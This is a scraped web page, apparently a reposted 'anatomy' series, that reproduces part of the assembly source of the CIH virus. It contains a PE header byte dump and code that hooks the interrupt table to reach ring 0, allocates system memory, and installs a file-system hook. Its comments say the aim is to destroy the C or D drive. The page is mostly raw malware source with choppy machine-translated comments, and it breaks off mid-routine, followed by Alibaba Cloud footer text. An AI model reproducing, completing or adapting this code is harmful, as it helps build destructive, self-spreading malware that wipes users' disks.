Virus program Source code example Anatomy-CIH virus [2]

Source: Internet
Author: User
virus Program Source code example Anatomy-CIH virus [2]

Originalappexe SEGMENT
  
; PE format executable file header
Fileheader:
DB 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
DB 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
DB 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
DB 00eh, 01FH, 0bah, 00eh, 000h, 0b4h, 009h, 0CDH
DB 021h, 0b8h, 001h, 04ch, 0CDH, 021h, 054h, 068h
DB 069h, 073h, 020h, 070h, 072h, 06FH, 067h, 072h
DB 061h, 06DH, 020h, 063h, 061h, 06eh, 06eh, 06FH
DB 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
DB 020h, 069h, 06eh, 020h, 044h, 04FH, 053h, 020h
DB 06dh, 06FH, 064h, 065h, 02eh, 00DH, 00DH, 00ah
DB 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
DB 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 0e0h, 000h, 00FH, 001h
DB 00BH, 001h, 005h, 000h, 000h, 010h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
DB 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
DB 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
DB 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
DB 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
DB 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
DB 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
DB 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
DB 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
DB 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DD 00000000h, Virussize
  
Originalappexe ENDS
  
; Virus program started
TRUE = 1
FALSE = 0
DEBUG = FALSE
  
; Identify its version number as 1.4 version
Majorvirusversion = 1; major version number
Minorvirusversion = 4; minor version number
Virusversion = majorvirusversion*10h+minorvirusversion; synthetic version number
  
if debug;
Firstkillharddisknumber = 81h; Destroy D-Disk
Hookexceptionnumber = 05h; use interrupt # 5th
ELSE
Firstkillharddisknumber = 80h; destroy C drive
Hookxceptionnumber = 03h; use Interrupt # 3rd
ENDIF
  
Filenamebuffersize = 7fh
  
; virus snippet Start
Virusgame SEGMENT
  
Assume Cs:virusgame, Ds:virusgame, Ss:virusgame
Assume Es:virusgame, Fs:virusgame, Gs:virusgame
  
Myvirusstart:
Push EBP
  
; Modify system exception handling to avoid generating error messages
Lea EAX, [esp-04h*2]
XOR ebx, EBX
Xchg eax, FS:[EBX]
  
Call @0
  
@0
The pop ebx; Gets the program start offset, using this offset + relative offset to obtain an absolute address
Lea ECX, STOPTORUNVIRUSCODE-@0[EBX]
Push ECX
Push EAX
  
; Modify the interrupt description table to get the highest level of RING0 permission
Push EAX
Sidt [esp-02h]; Gets the base address of the interrupt description table to EBX
Pop ebx;
  
add ebx, hookexceptionnumber*08h+04h; calculates the base address to use for the cutoff to EBX
  
CLI; Turn off interrupts prior to modification
  
mov ebp, [ebx]; Get the base address for exception handling
mov BP, [ebx-04h]; Get the entrance
  
Lea ESI, MYEXCEPTIONHOOK-@1[ECX]
  
Push esi, ESI for virus interrupt routine address
  
mov [ebx-04h], si;
SHR ESI, 16; modifying exceptions
mov [ebx+02h], si; modify the interrupt base to point to the virus interrupt routine
  
Pop esi
  
; Generate an exception that enters the RING0 level
int hookexceptionnumber; Enter the RING0 level in an interrupted manner
Returnaddressofendexception = $
  
; Merge all virus codes
Push ESI
mov esi, eax; ESI points at the beginning of the virus
  
; Cycle for replication
Loopofmergeallviruscodesection:
mov ecx, [eax-04h]
  
Rep MOVSB; Copy the virus code to the allocated system memory first address
Sub eax, 08h
mov esi, [eax]
or ESI, ESI
JZ quitloopofmergeallviruscodesection; ZF = 1
  
JMP loopofmergeallviruscodesection; Copy the next paragraph
  
Quitloopofmergeallviruscodesection:
Pop esi
int Hookexceptionnumber
  
; Save exception handling
Readyrestorese:
STI; open interrupt
XOR ebx, EBX
JMP Restorese
  
; When an exception occurs, the description is currently under Windows NT, the virus will stop running and jump directly to the original program
Stoptorunviruscode:
@1 = Stoptorunviruscode
  
XOR ebx, EBX
mov eax, FS:[EBX]
mov esp, [EAX]
  
Restorese:
Pop dword ptr FS:[EBX]
Pop eax
  
; Jump to the original program, normal execution
Pop EBP
  
Push 00401000h; Push Original
Originaladdressofentrypoint = $-4; Put the starting address of the original program into the stack
RET; return to the beginning of the original program in the form of a subroutine return
; Virus Initialization Module
Myexceptionhook:
@2 = Myexceptionhook
  
JZ Installmyfilesystemapihook; If the virus code is copied,
; Go to the program that installs the system hooks
  
mov ecx, dr0; see if Dr0 is set (Dr0 is a virus-resident flag)
JECXZ allocatesystemmemorypage; Allocate system memory if not set
  
Add DWORD ptr [ESP], readyrestorese-returnaddressofendexception
  
; return to the original program
Exitring0init:
mov [ebx-04h], BP;
SHR EBP, 16; Restore Exception
mov [ebx+02h], BP; restore the original interrupt base
  
iretd; interrupt return
  
; Allocating the system memory that will be used
Allocatesystemmemorypage:
mov dr0, ebx; Sets the flag where the virus resides dr0
Push 00000000fh;
push ecx;
Push 0FFFFFFFFH;
push ecx; Call method ulong EXTERN _pageallocate (ULONG npages,
; ULONG PType, ULONG VM, ulong alignmask, ULONG Minphys,
; ULONG Maxphys, ULONG *physaddr,ulong flags);
push ecx;
push ecx;
Push 000000001h;
Push 000000002h;
int 20h; VXD invocation
_pageallocate = $
DD 00010053h; using EAX, ECX, edx, and flags registers
Add ESP, 08h*04h; restore stack pointer
  
Xchg EDI, eax; EDI points to the assigned system memory first address
Lea EAX, Myvirusstart-@2[esi]; eax point at the beginning of the virus.
  
iretd; exit interrupt
  
; Initialize file system hooks
Installmyfilesystemapihook:
Lea EAX, Filesystemapihook-@6[edi]; point to file System Hook program first address
  
push eax;
int 20h; VXD call Ifsmgr_installfilesystemapihook
Ifsmgr_installfilesystemapihook = $
DD 00400067h; using EAX, ECX, edx, and flags registers
  
mov dr0, eax; Save original file System Hook program first address to Dr0
Pop eax; eax equals file System hook program first address
  
Save the entry of the original Ifsmgr_installfilesystemapihook function call
mov ecx, Ifsmgr_installfilesystemapihook-@2[esi]
mov edx, [ecx]; edx for Ifsmgr_installfilesystemapihook entrance
mov Oldinstallfilesystemapihook-@3[eax], edx
  
; Modify Ifsmgr_installfilesystemapihook Entrance
Lea EAX, Installfilesystemapihook-@3[eax]
mov [ECX], eax; Sets the address of the new Ifsmgr_installfilesystemapihook function call
; Make a point to Installfilesystemapihook
CLI; off interrupt

The above is the virus program source code example Analysis-cih virus [2] content, more relevant content please pay attention to topic.alibabacloud.com (www.php.cn)!

  • Related Article

    Contact Us

    The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

    If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

    A Free Trial That Lets You Build Big!

    Start building with 50+ products and up to 12 months usage for Elastic Compute Service

    • Sales Support

      1 on 1 presale consultation

    • After-Sales Support

      24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.